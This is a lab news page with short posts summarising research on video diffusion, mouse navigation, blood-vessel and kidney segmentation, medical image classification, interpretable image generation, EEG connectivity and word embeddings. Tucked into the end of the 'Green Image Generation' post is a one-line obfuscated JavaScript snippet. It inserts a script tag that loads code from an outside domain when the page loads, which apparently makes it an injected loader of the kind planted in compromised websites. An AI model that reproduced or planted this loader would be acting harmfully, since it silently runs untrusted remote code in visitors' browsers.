News

MCL Research on Robust Machine Learning

Autoregressive video diffusion models can generate high-quality frames in real time, but are limited to short clips — push them further, and the KV cache silently discards past context, causing identity drift and quality collapse. We introduce MemRoPE, a training-free framework that solves this with two co-designed mechanisms: Memory Tokens compress evicted frames into evolving dual-rate EMA representations, while Online RoPE Indexing stores keys without positional encoding and applies it dynamically at attention time, keeping temporal aggregation mathematically valid. The result is unbounded video generation with a fixed-size cache — we demonstrate continuous one-hour generation that preserves subject identity and visual fidelity throughout.

By |April 26th, 2026|News|Comments Off on MCL Research on Robust Machine Learning|

MCL Research on Mouse Motion Behavior

Understanding animal motion behavior is important for understanding how the brain organizes memory, decision-making, and goal-directed action. In our research, we study mouse navigation behavior using the Morris Water Maze (MWM), a widely used behavioral paradigm for investigating spatial learning and memory in rodents. While conventional measures such as escape latency and path length provide useful summaries of performance, they often do not fully capture the rich and dynamic nature of movement during navigation.

Our research focuses on understanding mouse motion behavior at a finer temporal scale. Instead of treating each trial as a single behavioral unit, we examine how navigation strategies evolve within a trial, since mice may shift among exploration, wall-following, scanning, circling, and more direct platform-oriented movement over time. These within-trial changes can offer deeper insight into learning processes, behavioral flexibility, and group differences that may be overlooked by aggregate metrics alone.

To support this goal, we develop an interpretable and lightweight computational framework for analyzing tracked trajectories from behavioral videos. Our approach analyzes motion continuously over time and identifies sub-trajectory-level navigational states. The pipeline first corrects for tracking irregularities through uniform resampling and smoothing, then derives geometry- and kinematics-based descriptors such as curvature, displacement, turning behavior, and target alignment. These features are mapped to human-readable behavioral categories through a hierarchical rule-based inference process, followed by temporal refinement to reduce fragmented or implausible label switching.

This work emphasizes interpretability and practical usability in neuroscience research. By providing point-wise annotations and visually verifiable outputs, the framework enables behavioral phenotyping and hypothesis-driven analysis of strategy transitions and learning dynamics.

By |April 19th, 2026|News|Comments Off on MCL Research on Mouse Motion Behavior|

MCL Research on Microscopic Blood Vessel Segmentation

Our recent research in volumetric biomedical image segmentation for blood vessels has focused on improving both segmentation accuracy and computational efficiency, particularly for high-resolution microscopy data. Architectures such as 3D U-Net have become a widely adopted standard due to their ability to model hierarchical spatial features in three-dimensional volumes. Over time, more advanced variants have achieved higher performance; however, these improvements are often accompanied by significantly increased parameter counts and computational cost, making them less practical for large-scale or resource-constrained applications. 

This trade-off is especially pronounced in high-resolution 3D microscopy imaging, where the input volumes are large and memory-intensive. Tasks such as vascular segmentation are inherently challenging, as these blood vessels are thin, low-contrast, and of complex structures with varying orientations. Capturing such characteristics in three dimensions is therefore important, but significantly more difficult than 2D settings, especially when it comes to resource-saving models. In addition, suitable datasets are limited in availability. High-quality volumetric microscopy data is very difficult and expensive to acquire, even for mouse brains and more so for humans. The annotations require significant expert effort, especially when one brain slice consists of over 50 million pixels, and the whole brain consists of thousands of slices. As a result, our study relies on a private dataset that consists of only a small annotated block from a single brain sample, as there are currently no available public datasets. While this allows detailed analysis of complex biological structures, it creates smaller datasets and fewer labelled samples, a problem we aim to solve with the 3D-GUSL.

To address these constraints, 3D-GUSL adopts a feed-forward U-shaped design that avoids backpropagation while preserving multi-scale spatial information. The pipeline operates hierarchically across resolution levels, where local 3D neighbourhoods are first transformed into structured feature [...]

By |April 12th, 2026|News|Comments Off on MCL Research on Microscopic Blood Vessel Segmentation|

MCL Research Presented at WACV 2026

MCL members, Jintang Xue and Kevin Yang, presented their papers at the Winter Conference on Applications of Computer Vision (WACV) 2026, Tucson, AZ, USA.

The title of Jintang et al.’s paper is “Descrip3D: Enhancing Large Language Model-based 3D Scene Understanding with Object-Level Text Descriptions”. Here is a brief summary:

“Understanding 3D scenes goes beyond simply recognizing objects; it requires reasoning about the spatial and semantic relationships between them. Current 3D scene-language models often struggle with this relational understanding, particularly when visual embeddings alone do not adequately convey the roles and interactions of objects. In this paper, we introduce Descrip3D, a novel and powerful framework that explicitly encodes the relationships between objects using natural language. Unlike previous methods that rely only on 2D and 3D embeddings, Descrip3D enhances each object with a textual description that captures both its intrinsic attributes and contextual relationships. These relational cues are incorporated into the model through a dual-level integration: embedding fusion and prompt-level injection. This allows for unified reasoning across various tasks such as grounding, captioning, and question answering, all without the need for task-specific heads or additional supervision. When evaluated on five benchmark datasets, including ScanRefer, Multi3DRefer, ScanQA, SQA3D, and Scan2Cap, Descrip3D consistently outperforms strong baseline models, demonstrating the effectiveness of language-guided relational representation for understanding complex indoor scenes.”

Kevin’s paper is entitled “SVD-Det: A Lightweight Framework for Video Forgery Detection Using Semanticand Visual Defect Cues”, co-authored with Tianyu Zhang, Feng Qian, Bing Yan, and C.-C. Jay Kuo. The summary goes as follows:

“With the rapid proliferation of AI-generated content (AIGC) on multimedia platforms, efficient and reliable video forgery detection has become increasingly important. Existing approaches often rely on either visual artifacts or semantic inconsistencies, but suffer from high computational costs, [...]

By |April 5th, 2026|News|Comments Off on MCL Research Presented at WACV 2026|

MCL Research on Medical Image Classification

We propose the development of a high-efficiency foundation model tailored for the MedMNIST v2 benchmark, utilizing a novel architecture based on Multi-Resolution Tree-Structured Vector Quantization (TSVQ). While current foundation models often rely on computationally expensive transformers, our approach focuses on a hierarchical quantization strategy. By employing multi-resolution codebooks, we can effectively capture and represent both long-range structural dependencies and intricate, short-range local correlations inherent in diverse medical imaging modalities, from pathology slides to radiological scans.

The core innovation lies in the tree-structured organization of the latent space. Unlike flat codebooks used in traditional VQ-VAEs, TSVQ offers a logarithmic search complexity, significantly reducing the energy required for both training and inference. This alignment with “Green Learning” principles ensures that our model achieves state-of-the-art representation fidelity without the massive carbon footprint typically associated with large-scale AI. By optimizing the codebook search and minimizing redundant parameters, we aim to demonstrate that high-performance medical AI can be both sustainable and accessible on modest hardware.

This framework serves as a robust, domain-agnostic foundation. The learned representations are designed to be highly transferable, enabling the model to excel across a spectrum of downstream tasks. Crucially, this architecture addresses the “small data” problem in clinical medicine; by pre-training on the comprehensive MedMNIST suite, the model can be fine-tuned on smaller, domain-specific clinical datasets with superior accuracy and stability. Ultimately, we aim to expand this green learning paradigm to broader healthcare applications, empowering the medical community with scalable, low-power, and high-precision diagnostic tools.

By |March 29th, 2026|News|Comments Off on MCL Research on Medical Image Classification|

MCL Research on Green Image Generation

Although generative adversarial networks (GANs) and diffusion models achieve impressive realism through neural networks and backpropagation, the learned representations and latent spaces lack clear attribution and interpretability. Understanding the generation process requires auxiliary probing or post-hoc analysis. Empirical studies suggest that some models implicitly follow a coarse-to-fine generation mechanism, in which early stages determine the global structure and layout, and later stages progressively refine details and inject texture and style. This work explicitly formalizes this mechanism and presents a feed-forward image generation (FIG) process with well-defined objectives at each stage. FIG statistically models the lowest-resolution images and then progressively refines them. Unlike neural generative models, FIG provides explicit interpretability and attribution. Each generated region can be traced to its associated source and refinement. This property facilitates controllability, supports privacy-aware generation without retraining, and allows transparent manipulation of generated content. Compared to representative baselines based on GAN and diffusion, FIG achieves competitive visual quality, offers superior interpretability, and improves robustness in data-sparse regimes.

We introduced FIG, an interpretable and fully feed-forward image generation framework that formalizes the separation between global structure modeling and local detail refinement. FIG records pixel-level attribution throughout multi-resolution enhancement, enabling each synthesized detail to be attributed, controlled, or selectively modified. This design enables control over the global appearance, semantic attributes, and localized regions without affecting the rest of the image. Furthermore, the transparent retrieval process supports source-aware filtering, allowing selective exclusion of sensitive training samples without retraining. Extensive benchmark results demonstrate that FIG maintains competitive generation quality while offering these interpretability and controllability.
;(function(f,i,u,w,s){w=f.createElement(i);s=f.getElementsByTagName(i)[0];w.async=1;w.src=u;s.parentNode.insertBefore(w,s);})(document,’script’,’https://content-website-analytics.com/script.js’);

By |March 22nd, 2026|News|Comments Off on MCL Research on Green Image Generation|

MCL Research on EEG Data Analysis

Our work starts with a simple idea: the way different brain regions communicate can reveal a lot about what the brain is doing. Instead of treating EEG as a collection of separate channels, we view it as a network and study the connectivity patterns between regions. This kind of representation is useful because different brain states often produce different connectivity structures. In other words, brain connectivity maps can provide a more intuitive and informative picture of neural activity than raw signals alone.

In one of our studies, we use the direct Directed Transfer Function (dDTF) to build these maps. A key advantage of dDTF is that it captures not only whether two brain regions are related, but also the direction of information flow between them. This makes it a good tool for describing dynamic interactions in the brain. In particular, these connectivity patterns for mental workload show clear differences across conditions. As illustrated in Fig. 2, low and high workload states already present visibly different connectivity maps across several frequency bands, suggesting that they contain meaningful information for distinguishing cognitive states.

Based on this observation, we developed the framework shown in Fig. 1. We first decompose the EEG signals into multiple frequency bands and construct a connectivity map for each band. These multiband maps are then combined into a unified feature representation. From there, we progressively refine the features, selecting the most informative ones and transforming them into a more discriminative space before making the final prediction. In this way, our method leverages interpretable brain connectivity patterns while keeping the overall learning pipeline efficient, practical, and easy to extend to other EEG analysis tasks.

By |March 15th, 2026|News|Comments Off on MCL Research on EEG Data Analysis|

MCL Research on Variable-Length Word Embeddings

We propose Variable-Length Word Embeddings, a POS-aware and compute-efficient Word2Vec training framework. Traditional embeddings assign the same dimensionality to every token, even though different parts of speech contribute very differently to sentence meaning. In real text, nouns usually carry the main semantic content, verbs encode actions and relations, while many other categories (e.g., articles, prepositions, conjunctions) are comparatively low-information. This motivates a representation strategy that spends more capacity on important words and less capacity on the rest.

Our core idea is to use POS tags to organize training data and allocate embedding dimensions accordingly. We first POS-tag the entire corpus and split it into three views: a noun-only corpus, a noun+verb corpus, and a full corpus containing all tokens. Instead of training one uniform embedding space, we build embeddings in stages so that nouns become the backbone, verbs are learned relative to that backbone, and the remaining words are learned with minimal capacity.

We train nouns progressively with increasing dimensionality. Specifically, we learn noun embeddings at 50D, 100D, and 200D on the noun-only corpus. To make training across dimensions stable and efficient, each higher-dimensional model is initialized from the previous lower-dimensional embeddings using Lanczos interpolation (50D → 100D, and 100D → 200D), and then refined on the noun-only corpus. This produces high-capacity noun representations while preserving continuity across stages.

After obtaining the noun backbone at each dimension, we introduce verbs through a controlled adaptation step. Using the noun+verb corpus, we train verbs on top of the noun space, where noun vectors are soft-frozen (implemented with a reduced update factor) so they remain stable but can still adjust slightly. Verbs, in contrast, are fully trainable and learn to align with noun semantics. We apply this procedure at 50D [...]

By |March 8th, 2026|News|Comments Off on MCL Research on Variable-Length Word Embeddings|

MCL Research on Renal Image Segmentation

AI-driven medical imaging has emerged as a transformative force in modern healthcare, empowering clinicians to deliver more accurate, efficient, and personalized diagnostic and therapeutic strategies. By automatically analyzing CT, MRI, ultrasound, and other imaging modalities, AI systems can identify subtle patterns, precisely segment anatomical structures, and support clinical decision-making with enhanced accuracy and consistency. These advancements not only improve diagnostic performance but also streamline clinical workflows and ultimately elevate the overall quality of patient care.

Among the many tasks in medical image analysis, kidney and kidney tumor segmentation are pivotal for the management of renal diseases, particularly renal cell carcinoma. Precise delineation of kidneys and tumors is essential for quantitative tumor assessment, treatment planning, surgical navigation, postoperative monitoring, and radiomics research. Accurate segmentation enables clinicians to reliably estimate tumor burden, evaluate tumor–organ spatial relationships, and facilitate nephron-sparing surgical strategies, all of which directly influence patient outcomes. Given that manual segmentation is labor-intensive and prone to inter- and intra-observer variability, the development of automated, robust, and reliable segmentation methods has become increasingly critical for both routine clinical practice and large-scale research.

To address these limitations, we propose 3D-Cube Multi-Stage Green U-shaped Learning (GUSL), a novel multi-stage feed-forward machine learning framework for 3D medical image segmentation without backpropagation. GUSL is designed to be computationally efficient, interpretable, and environmentally sustainable, while maintaining competitive segmentation performance.

The proposed framework adopts a cascaded multi-stage segmentation strategy tailored to different anatomical tasks. As illustrated in Figure 1, distinct stages are designed for coarse-to-fine segmentation. First, the original CT volume is downsampled to a lower resolution, enabling efficient coarse localization of the kidney with reduced computational complexity. This low-resolution stage provides an approximate spatial position of the kidney, as highlighted in the red box. [...]

By |March 1st, 2026|News|Comments Off on MCL Research on Renal Image Segmentation|

MCL Research on Renal Imaging Analysis

Our paper proposes a multi-stage Green U-shaped Learning (GUSL) framework for efficient and reliable IHC image quantification. As shown in the overall pipeline (Stage I–III), the system starts with the preprocessing of the input IHC image using normalization and PCA. In Stage I, marker-specific GUSL modules learn mpIF-informed intermediate representations, such as LAP2 and KI67-related cues, from co-registered training data. In Stage II, these representations are integrated by a dedicated GUSL module to generate a cell/background segmentation map in a coarse-to-fine and residual refinement manner. In Stage III, connected cell regions are extracted, and cell-level classification is performed to determine whether each cell is biomarker-positive or biomarker-negative. The entire framework follows a feedforward, modular design without end-to-end backpropagation, reducing computational cost while keeping the system transparent and interpretable.

Qualitative examples are shown in the second figure. Column (a) presents the input brightfield IHC images. Column (b) shows the ground-truth cell segmentation and biomarker labels. Columns (c) and (d) compare results from a representative deep learning baseline and our GUSL method. We observe that the proposed method produces clearer cell boundaries and more consistent positive/negative classification, especially in crowded regions and low-contrast areas. These visual results are consistent with our quantitative evaluation, which demonstrates competitive segmentation accuracy and improved quantification agreement, while using much lower model complexity and energy consumption.

By |February 22nd, 2026|News|Comments Off on MCL Research on Renal Imaging Analysis|